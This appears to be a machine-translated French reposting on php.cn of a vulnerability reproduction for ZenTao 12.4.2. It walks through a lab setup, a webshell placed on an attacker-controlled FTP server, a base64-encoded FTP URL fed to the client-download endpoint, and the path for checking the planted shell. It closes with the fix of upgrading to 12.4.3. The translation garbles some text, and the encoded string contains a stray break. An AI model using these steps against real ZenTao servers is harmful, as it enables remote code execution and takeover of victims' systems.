Maison > Opération et maintenance > Sécurité > Quels sont les droits d'administrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

Quels sont les droits d'administrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

WBOY
Libérer: 2023-05-16 15:43:12
avant
1594 Les gens l'ont consulté

0x00Introduction

ZenTao est un logiciel professionnel de gestion de projet de R&D open source national qui intègre la gestion de produits, la gestion de projet, la gestion de la qualité, la gestion des documents, la gestion organisationnelle et la gestion des transactions, couvrant complètement les processus de base du projet de R&D. gestion. L'idée de gestion est basée sur la méthode de gestion de projet agile de renommée internationale - Scrum. Sur la base du respect de ses valeurs et de la combinaison de l'état actuel de la recherche et du développement de projets nationaux, elle intègre de multiples fonctions telles que la gestion des tâches, la gestion de la demande, les bugs. gestion, gestion des cas d'utilisation, etc., couvrant le logiciel depuis la planification jusqu'à l'ensemble du cycle de vie d'une version.

Aperçu de la vulnérabilité 0x01

Il existe une vulnérabilité de téléchargement de fichiers arbitraire dans ZenTao version 12.4.2. Cette vulnérabilité est due au fait que le filtrage dans la méthode de téléchargement dans la classe client n'est pas strict et que FTP peut être utilisé pour télécharger des fichiers. Et le répertoire de stockage des fichiers téléchargés peut analyser les fichiers php, provoquant getshell.

0x02 version affectée

ZenTao ≤ 12.4.2

0x03 environnement construction

phpstudy2018 + ZenTao 12.4.2 Adresse de téléchargement officielle de ZenTao :

https://www.zentao.net/dynamic / zentaopms12. 4.2-80263.html

3.1. Après le téléchargement, placez-le dans phpstudy et installez-le

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

3.2. Vérifiez l'extension qui a échoué, ouvrez simplement l'extension dans phpstudy.

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

3.3. Définissez les informations de la base de données, définissez-les ici sur votre propre configuration de base de données.

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

3.4 Créez le compte et l'installation est terminée

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

3.4. Utilisez l'environnement pour créer le service FTP. En prenant Windows2008R2 comme exemple, ajoutez le rôle et ajoutez ftp

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

3.5. Ajoutez ensuite le service FTP au site Web sous Internet Information Services.

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

3.6. Configurez en fonction de votre propre situation, l'étape suivante est

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

3.7. Mettez un webshell dans le répertoire ftp puis vérifiez le navigateur pour voir si ftp est accessible. normalement

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

Récurrence de la vulnérabilité 0x04

1. Ajoutez d'abord le chemin du ftp au shell pour l'encodage base64

Avant le cryptage : ftp://192.168.3.200/shell.php

Après le cryptage : ZnRwJTNBLy8xOTIuMTY4Lj. MuMjAwL3NoZWxsLnBocA==

2.Utilisez EXP, placez le base64 chiffré dans le dans exp

http://127.0.0.1/zentaopms/www/index.php/client-download-1-

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

3. Utilisez le chemin du lien suivant pour tester si le shell a été téléchargé sur le serveur

http://192.168.3.200/zentaopms/www/data/client/1. /shell.php

Quels sont les droits dadministrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

Méthode de réparation 0x05

1 Mise à niveau vers ZenTao 12.4.3 et versions ultérieures

.

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:yisu.com
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal